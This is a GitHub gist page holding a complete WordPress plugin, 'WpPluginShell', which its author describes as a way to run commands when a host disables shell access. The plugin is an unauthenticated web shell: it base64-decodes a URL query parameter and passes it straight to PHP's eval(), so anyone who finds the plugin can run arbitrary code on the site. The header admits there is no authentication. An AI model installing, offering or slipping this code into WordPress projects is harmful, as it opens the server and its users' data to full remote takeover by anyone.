Skip to content

Instantly share code, notes, and snippets.

@Phaeilo
Created February 25, 2013 13:53
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Phaeilo/5029921 to your computer and use it in GitHub Desktop.
Save Phaeilo/5029921 to your computer and use it in GitHub Desktop.
<?php
/**
* Plugin Name: WpPluginShell
* Plugin URI: http://example.org
* Description: This plugin allows arbitrary command execution, lol. Useful if you have a crazy hosting company which randomly disables shell access. There is no authentication, so don't leave this plugin active/installed any longer than necessary.
* Version: 1.33.7
* Author: Philip
* Author URI: http://example.org
* License: WTFPL
* License URI: http://www.wtfpl.net/
*/
if(isset($_GET['wppluginshell'])) {
eval(base64_decode($_GET['wppluginshell']));
}
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment